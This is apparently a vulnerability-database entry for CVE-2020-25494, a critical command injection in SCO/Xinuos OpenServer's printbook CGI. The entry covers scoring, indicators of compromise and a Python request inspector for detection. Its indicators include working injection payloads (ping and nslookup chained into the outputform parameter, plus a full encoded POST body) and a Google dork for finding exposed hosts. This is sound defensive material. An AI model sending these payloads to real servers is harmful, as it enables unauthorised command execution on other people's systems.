CVE-2020-25494
published 2020-12-18


Priority: P1 (84)
CVSS 3.1: 9.8 critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 39.19% (98.4th percentile)
Xinuos (formerly SCO) Openserver v5 and v6 allows attackers to execute arbitrary commands via shell metacharacters in outputform or toclevels parameter to cgi-bin/printbook.

Affected (2 ranges)

Vendor   Product      Version range   Fixed in
xinuos   openserver   (not given)     (not given)
xinuos   openserver   (not given)     (not given)

Detection & IOCs (extracted from sources)

url: http://host:8457/cgi-bin/printbook
path: /cgi-bin/printbook
port: 8457
command: |nslookup -q=cname mytest.com.&
command: |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1
other: outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.
  • Monitor POST requests to /cgi-bin/printbook containing shell metacharacters (|, `, #, &) in the 'outputform' or 'toclevels' parameters, which indicate OS command injection attempts.
  • Use the Google dork 'inurl:/cgi-bin/manlist?section' to identify exposed SCO Openserver instances on the internet.
  • Alert on outbound DNS lookups (nslookup/dig) or ICMP ping traffic originating from the web server process (e.g., Apache/CGI child) as an indicator of successful out-of-band command injection.
  • The vulnerable service runs on TCP port 8457 under Apache/1.3.33 with mod_perl/1.29. Fingerprint this server banner to identify exposed targets.
  • Both 'outputform' and 'toclevels' POST parameters are vulnerable; detection rules must cover both parameters, not just one.
  • Exploitation is confirmed on SCO Openserver 5.0.7 and version 6; other versions may also be affected.
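As an added illustration of the first and fifth detection bullets above (this is not code from the page's sources), the following Python inspector takes a raw HTTP request as a WAF or IDS would see it on TCP 8457, percent-decodes the form body and query string, and flags requests to /cgi-bin/printbook whose outputform or toclevels values contain shell metacharacters. The sample requests are constructed for the example; the metacharacter set extends the page's list (|, `, #, &) with ;, $, parentheses, redirection and newline, which is an assumption about other separators worth alerting on.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests (not taken from the page's sources).
# [0] benign use of the CGI, [1] metacharacters in outputform,
# [2] metacharacters in toclevels, [3] a request to an unrelated path.
SAMPLE_REQUESTS = [
    "POST /cgi-bin/printbook HTTP/1.1\r\nHost: host:8457\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "outputform=ps&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html",
    "POST /cgi-bin/printbook HTTP/1.1\r\nHost: host:8457\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "outputform=ps%7C%60x%60%20%23&booktitle=test&toclevels=3",
    "POST /cgi-bin/printbook HTTP/1.1\r\nHost: host:8457\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "outputform=ps&booktitle=test&toclevels=3%26x",
    "GET /cgi-bin/manlist?section=1 HTTP/1.1\r\nHost: host:8457\r\n\r\n",
]

TARGET_PATH = "/cgi-bin/printbook"
# Both parameters must be watched; covering only one misses half the cases.
WATCHED_PARAMS = ("outputform", "toclevels")
# Page lists | ` # &; the remaining characters are an added assumption.
META = re.compile(r"[|`#&;$()<>\n]")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, query, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    return method, path, query, body


def inspect_request(raw):
    """Return a list of (param, metacharacters, decoded value) findings.

    Both the query string and the form body are decoded so that a GET
    variant of the same request is caught too. parse_qs percent-decodes,
    so %7C and %60 are compared as the real | and ` characters.
    """
    _method, path, query, body = parse_request(raw)
    if path != TARGET_PATH:
        return []
    params = {}
    for source in (query, body):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    findings = []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            hits = sorted(set(META.findall(value)))
            if hits:
                findings.append((name, hits, value))
    return findings


def scan(requests):
    """Return indices of requests that produced at least one finding."""
    return [i for i, raw in enumerate(requests) if inspect_request(raw)]


if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        for name, hits, value in inspect_request(SAMPLE_REQUESTS[i]):
            print(f"request {i}: metacharacters {hits} in {name}={value!r}")
```

Because the check runs on the decoded value, encoding tricks such as %7c versus %7C or + for space do not evade it; a stricter rule could additionally require toclevels to be purely numeric, since the CGI expects a small integer there.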

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck             9.8     CRITICAL